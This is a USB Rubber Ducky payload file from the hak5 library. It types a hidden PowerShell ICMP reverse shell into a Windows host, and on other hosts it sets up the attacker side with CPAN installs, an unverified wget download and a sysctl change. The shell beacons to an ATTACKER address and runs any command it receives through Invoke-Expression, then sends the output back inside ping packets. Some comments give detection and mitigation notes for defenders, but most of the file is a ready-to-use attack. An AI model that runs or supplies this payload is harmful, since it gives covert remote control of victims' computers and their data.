GitHub Repository: hak5/usbrubberducky-payloads
Path: blob/master/payloads/library/remote_access/PingZhellDucky/payload.txt
REM PingZhellDucky
REM Version 1.2
REM OS: Windows & Unix
REM Author: 0i41E
REM Requirements: DuckyScript 3.0, Perl

REM Gets remote access via ICMP, or performs the required setup

REM PASSIVE_WINDOWS_DETECT extension, made by Korben, to identify the OS
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.0

REM Windows fully passive OS Detection and passive Detect Ready
REM Includes its own passive detect ready. Does not require
REM additional extensions

REM USAGE:
REM Extension runs inline (here)
REM Place at beginning of payload (besides ATTACKMODE) to act as dynamic
REM boot delay
REM $_OS will be set to WINDOWS or NOT_WINDOWS

REM CONFIGURATION:
REM MAX_WAIT is the number of polls and CHECK_INTERVAL the DELAY between
REM polls, so the loop below waits at most 150 x 20 = 3000 DELAY units
REM (milliseconds in DuckyScript) before it gives up.
DEFINE MAX_WAIT 150
DEFINE CHECK_INTERVAL 20
REM A host is labelled Windows only when its configuration request count
REM is greater than this threshold.
DEFINE WINDOWS_HOST_REQUEST_COUNT 2
REM Value stored in $_OS for every host that is not labelled Windows.
DEFINE NOT_WINDOWS 7

VAR $MAX_TRIES = MAX_WAIT
REM Poll until the lock-LED reply flag is set or the tries run out.
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
REM The classification is a heuristic on the request count alone: any host
REM that does not exceed the threshold becomes NOT_WINDOWS, whatever it
REM actually runs. Code that branches on $_OS inherits that uncertainty.
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
ELSE
$_OS = NOT_WINDOWS
END_IF

REM EXAMPLE USAGE AFTER EXTENSION
REM IF ($_OS == WINDOWS) THEN
REM STRING HELLO WINDOWS!
REM ELSE
REM STRING HELLO WORLD!
REM END_IF
END_EXTENSION
REM Configure your settings below:
REM Insert the attacking IP between ''
REM This value is substituted into every Ping.Send call typed on the
REM Windows host, so it is the destination of all ICMP echo requests the
REM payload generates and the address to look for in network logs.
DEFINE ATTACKER '0.0.0.0'
REM Set the default DELAY
REM Used as the pause between the typed chunks in the branches below.
DEFINE WAIT 250
REM Do you want to install the dependencies and set up the infrastructure?
REM Will trigger when not using Windows - Best use with Linux
DEFINE INSTALL TRUE
REM Link to the PingZhellDucky.pl client - Required for installation
REM NOTE(review): the URL tracks the master branch of a personal fork
REM (0i41E/usbrubberducky-payloads) and the setup step downloads it with
REM no integrity check, so the fetched script can change without notice.
REM Pin the link to a reviewed commit and verify a checksum of the
REM downloaded file before running it.
DEFINE CLIENTLINK https://raw.githubusercontent.com/0i41E/usbrubberducky-payloads/master/payloads/library/remote_access/PingZhellDucky/PingZhellDucky.pl
REM Main stage. On a host labelled Windows it opens the Run dialog, starts
REM a hidden PowerShell and types a script into it. On any other host it
REM types either the setup commands (INSTALL TRUE) or a notice.
REM
REM What the typed PowerShell does, as written:
REM  - sends one ICMP echo request to ATTACKER carrying a prompt string
REM    ('Ducky@PS ' + current path);
REM  - then loops: sends an echo request with an empty payload; if the
REM    reply carries data, decodes it as ASCII, passes it to IeX
REM    (Invoke-Expression) and returns the output in echo requests of at
REM    most $BufferSize (128) bytes; if the reply is empty, sleeps $Delay
REM    (5) seconds.
REM
REM Risk: the channel has no authentication and no encryption. Whatever
REM text arrives in a reply from that address is executed, and commands
REM and output cross the network as readable ASCII.
REM
REM Detection and mitigation notes for defenders:
REM  - Host: process-creation telemetry with command lines (e.g. Security
REM    event 4688, Sysmon event 1) shows powershell.exe started with
REM    -NoP -NonI -w h; PowerShell script block logging (event 4104)
REM    records the typed script, including the IeX call; Run-dialog input
REM    is also kept in the user's RunMRU registry key.
REM  - Network: repeated ICMP echo requests to a single destination whose
REM    payloads hold readable text (the 'Ducky@PS ' prompt, command output)
REM    instead of the operating system's default ping pattern.
REM  - Mitigation: restrict outbound ICMP at the egress boundary, apply
REM    USB/HID device control, and constrain PowerShell (e.g. Constrained
REM    Language Mode) on endpoints.
IF ($_OS == WINDOWS) THEN
DELAY 1500
GUI r
DELAY 500
STRINGLN powershell -NoP -NonI -w h
DELAY 500
STRING ;$Delay=5;$BufferSize=128;$ICMPDucky=New-Object System.Net.NetworkInformation.Ping;$PingDuck=New-Object System.Net.NetworkInformation.PingOptions;$PingDuck.DontFragment = $True;$QuackAttack = ([text.encoding]::ASCII).GetBytes('Ducky@PS '+(gl).Path+'> ');$ICMPDucky.Send( ATTACKER ,60 * 1000, $QuackAttack, $PingDuck) | Out-Null;while ($true){$QuackAttack=([text.encoding]::ASCII).GetBytes('');$reply=$ICMPDucky.Send( ATTACKER ,60 * 1000, $QuackAttack, $PingDuck);if ($reply.Buffer){$response=([text.encoding]::ASCII).GetString($reply.Buffer);$result=(IeX -Command $response 2>&1 | Out-String );$QuackAttack = ([text.encoding]::ASCII).GetBytes($result);$index=[math]::floor($QuackAttack.length/$BufferSize);$i = 0;
DELAY WAIT
STRINGLN if($QuackAttack.length -gt $BufferSize){while ($i -lt $index ){$NGGYU2 = $QuackAttack[($i*$BufferSize)..(($i+1)*$BufferSize-1)];$ICMPDucky.Send( ATTACKER ,60 * 10000, $NGGYU2, $PingDuck) | Out-Null;$i +=1;};$remainingindex=$QuackAttack.Length % $BufferSize;if($remainingindex -ne 0){$NGGYU2 = $QuackAttack[($i*$BufferSize)..($QuackAttack.Length)];$ICMPDucky.Send( ATTACKER ,60 * 10000, $NGGYU2, $PingDuck) | Out-Null}}else{$ICMPDucky.Send( ATTACKER ,60 * 10000, $QuackAttack, $PingDuck) | Out-Null};$QuackAttack = ([text.encoding]::ASCII).GetBytes("`nDucky@PS " + (pwd).Path + '> ');$ICMPDucky.Send( ATTACKER ,60 * 1000, $QuackAttack, $PingDuck) | Out-Null}else{Start-Sleep -Seconds $Delay}}
ELSE
REM Non-Windows branch. These lines are typed into whatever window has
REM keyboard focus; nothing here opens a terminal first.
IF INSTALL THEN
DELAY WAIT
STRINGLN echo "Setting up Infrastructre - Do not interact!"
DELAY 2000
REM The chain installs Perl modules from CPAN, downloads the client from
REM CLIENTLINK without verifying it, and sets
REM net.ipv4.icmp_echo_ignore_all=1. That sysctl is host-wide: the kernel
REM stops answering all pings until it is set back to 0 or the machine
REM reboots, which also affects ping-based monitoring of this host.
REM Each step only runs if the one before it succeeded (&&).
STRINGLN cpan IO::Socket NetPacket::IP NetPacket::ICMP && wget CLIENTLINK && sysctl -w net.ipv4.icmp_echo_ignore_all=1 && echo "Setup complete!"
ELSE
STRING Please insert device into a Windows machine or change the settings!
END_IF
END_IF